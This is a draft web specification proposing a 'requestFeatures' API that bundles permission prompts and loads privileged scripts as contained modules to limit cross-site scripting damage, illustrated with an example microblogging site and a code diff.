This specification describes a mechanism that enables authors to request access to multiple additional user agent capabilities with a single call rather than many, thereby addressing the user for permission only once, and encapsulates the resulting access permission in a secure container in order to protect the increased privileges granted to a web application from cross-site scripting (XSS) attacks.
This document is currently more of a sketch of a proposal than a properly defined specification. The terminology is loose in parts, and requirements need a fair amount of tightening.
As it currently stands, this document is nothing more than a proposal from its editor, with no backing implied or otherwise from any other party.
As user agents provide increasing access to privileged capabilities that expose sensitive aspects of users' data and environment (geolocation, contacts, calendar, camera, local storage…), two distinct yet related problems increase in lockstep.
First, since these capabilities cannot be safely granted without the user's decision, and given that many of them cannot be integrated into the flow of an action that seems natural to the user (e.g. as file system access does), requesting permission for multiple capabilities leads to multiple user prompts of some form. The resulting experience is less than ideal, and what's more it trains users to blindly accept such requests, even when they are not modal.
Additionally, the depth of cross-site scripting (XSS) attacks is increased. Overall, XSS vulnerabilities are extremely common, but in many cases their presence has caused little more than harmless pranks, if anything at all. This is largely due to the fact that the user agent is sandboxed, and that therefore the power of an XSS attack is only as great as that of the site being compromised — which in many cases is minimal. With additional privileges being granted however, the problem arises of the user agent's being far less sandboxed than it was previously. Users should naturally only grant elevated privileges to sites that they can ascertain are legit and trustworthy. We cannot require of them however that they audit the code powering such sites looking for XSS vulnerabilities.
Ideally, protection from XSS should therefore be strengthened when additional capabilities are granted more or less in bulk, all the while without breaking existing content, without requiring massive remodelling of the web user agent security model, and with minimal requirements placed upon authors (preferably no more than a few new methods and reuse of an existing common convention).
Note that there already exist means for web site authors to protect against XSS attacks, for instance the Content Security Policy [[CSP]]. These, however, are voluntary protections put in place by competent site administrators. As such, they are extremely useful, but we can simultaneously approach the problem from the other end, namely from the client side, so that users are equally protected from the hapless.
As an example, we will take a simple community microblogging system: Unicorner. It's a typical microblogging site, where those interested in unicorns flock to discuss their passion. The site is entirely legit, and run by well-meaning unicorn-lovers.
When posting a message, the user transmits some geolocation information which is then partially available to others as a city or region (rather than with the exact coordinates). Messages are also stored locally so that people can access their previous discussions even when the site is offline. This part touches on our first problem: multiple permission requests need to be made before the site is even useful.
The client code trusts the server to sanitise the data it sends to it (or didn't think it through) and assigns the content of messages interpreting them fully as HTML when it shouldn't be necessary. Naturally, something is wrong with the server's sanitisation code, and some HTML can be sent through if crafted correctly. This brings in our XSS vulnerability.
No server-side code was developed for this example, but what it does (or fails to do) can easily
be inferred. Also, the notatallevil.js
script that gets injected would naturally normally
live on a different server.
You can look at the example in action (download). It requires Geolocation and IndexedDB support (though you can still read the source if your browser does not support those).
Two things can be noted: there are too many permission prompts for a smooth experience, and simply because
you looked at a given, innocent-looking message your position is now being broadcasted to an evil
third-party (and given that the message is stored locally, this could be going on for a while. Sites that
use localStorage
to cache scripts locally would present an even more interesting opportunity).
We will now show how to implement the very same functionality using FRAC. You can try the example (download) but it will only work in a FRAC-enabled browser and as of this writing those are few and far apart. We can look at the code however to see how it has been modified.
The first thing to note is that the changes required to the entire code are extremely minimal:
diff -wU 1 xss-pwnd/index.html frac-unicorner/index.html --- xss-pwnd/index.html 2011-05-26 16:58:10.000000000 +0200 +++ frac-unicorner/index.html 2011-05-26 17:26:50.000000000 +0200 @@ -18,6 +18,5 @@ <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js'></script> - <script src='unicorner.js'></script> <script> - jQuery(function () { - UI.loadEverything(); + requestFeatures(["geolocation", "indexeddb"], ["unicorner.js"], function (unicorner) { + unicorner.UI.loadEverything(jQuery); }); diff -wU 1 xss-pwnd/unicorner.js frac-unicorner/unicorner.js --- xss-pwnd/unicorner.js 2011-05-26 17:12:03.000000000 +0200 +++ frac-unicorner/unicorner.js 2011-05-26 17:27:16.000000000 +0200 @@ -1,6 +1,6 @@ -(function (exports, $) { - var curLocation = null, db, store; +var curLocation = null, db, store, $; exports.UI = { - loadEverything: function () { + loadEverything: function (jq) { + $ = jq; Messaging.watchLocation(); @@ -55,2 +55 @@ }; -})(window, jQuery);
We have simply: 1) removed the direct loading of the application script, 2) replaced the jQuery onload
handler with a call to requestFeatures
, and 3) unwrapped the script from its self-calling
anonymous function since we don't need that protection anymore.
Loading the script is performed with the following code:
requestFeatures(["geolocation", "indexeddb"], ["unicorner.js"], function (unicorner) { unicorner.UI.loadEverything(jQuery); });
This simple call takes three parameters. The first is a list of capabilities required for the application to execute (in this case geolocation and access to the IndexedDB local storage). By bundling these in a single array the user agent is able to display a user interface that requests permission for all the capabilities at once, thereby making the user experience more fluid (An example of a potential user interface for such an approach can be seen in the Feature Permissions Playground.).
Second is a list of the scripts that we wish to load and provide with these capabilities (in this case
there is only one, unicorner.js
). Those are regular Javascript pieces of code, except that
instead of sharing the same execution scope as the main one, they are encapsulated in a manner similar
to that of CommonJS [[!COMMONJS]]. They have access to the same host objects that are exposed in the main
scope (navigator
, document
, etc.) but global variables defined there in Javascript
are invisible to them. Conversely, their own globals are not available to the main scope. The way in which
such scripts expose their functionality is by assigning to an exports
variable. Users of
CommonJS will be familiar with the approach.
Finally is a callback, which is called when the capabilities are accepted and the scripts have loaded.
It gets called with a list of objects, each of which corresponds to the exports
variable for each script. Therefore, the following code in unicorner.js
:
exports.UI = { loadEverything: function (jq) { // ... } };
makes it possible to call unicorner.UI.loadEverything(jq)
in the previous
example.
You will note that the XSS vulnerability is still present. However, calling requestFeatures
tells the user agent that the author has decided to use elevated privileges only in code loaded
through requestFeatures
and therefore the injected code's attempt to use Geolocation
will fail. Code could be injected that calls requestFeatures
directly, but it is strictly
limited to loading from the same origin, which also precludes this attack.
In conclusion, with the addition of a simple API and a subset of the familiar CommonJS modules, we have both improved the user experience for web applications accessing multiple capabilities, and provided additional protection against XSS attacks.
This specification defines conformance criteria that apply to a single product: a user agent that implements the interfaces defined in this document.
A user agent that exposes these APIs to Javascript [[!ECMA-262]] MUST implement them in accordance with the ECMAScript Bindings defined by Web IDL [[!WEBIDL]].
This interface defines a simple method for loading modular scripts that have access to a specific set of privileged features.
Requests a list of features that are to be made available (at the user's agreement) to a list of scripts, which are loaded in a contained manner as described in section . When these two operations are performed successfully, the callback is called with a list of objects representing each script module.
A list of feature strings (e.g. geolocation
, contacts
, indexeddb
)
that the author is requesting access to. Individual feature strings are defined by their respective
specifications. A user agent MUST ignore feature strings which it does not know. Vendor-specific
features are expected to be identified using vendor-prefixed strings. Mechanisms to obtain user
agreement for access to these features are left up to implementations. If this list is empty, no
user agreement is necessary and the modules are loaded immediately.
While the user agent is expect to make it easy to accept all or none of the requested features in bulk, such outcomes are not required. Any number of features can be accepted or rejected in the set, and the scripts will still load. They will simply have access to only those features which were accepted. Likewise, irrespective of the user decision made for these, all privileged features in the main scope are expected to be declined.
An API to discover which features have been granted and which haven't would prove useful in this context. That is indeed part of what the Feature Permissions specification proposes.
undefined
object in the callback. Each of
the script is loaded as a contained module, as described in section .
This is the wrapper interface for requestFeatures()
completion callbacks.
The global scope in each module script is a proxy to the main scope such that the many host-defined
properties of window
are available. However, script-defined properties are restricted to their
respective scopes.
The one addition to the module scope is the exports
attribute, which is an empty object
which the module can modify in order to make functionality available to requiring scopes. The exports
object functions as defined in [[!COMMONJS]].
Naturally, a module can still shoot itself in the foot and expose functionality that would open the privileged features to XSS vulnerabilities, but it is nevertheless much less likely to happen by mistake. The simplest way of shooting oneself in the foot in a module would be as follows:
// assuming geolocation privileges have been granted exports.geolocation = navigator.geolocation;
It is, however, difficult to protect against active stupidity — we only endeavour to contain the more passive kind here.
A sketchy IDL is provided below. Questions are open as to whether WindowProxy
is the
proper interface to inherit with, and as to the best way of specifying the access behaviour to the
requesting scope window
.
Many thanks to Domimique Hazael-Massieux and Bryan Sullivan for being the early sounding boards for this idea while in Seoul, as well as to Doug Turner and the folks at Mozilla Labs for their feedback.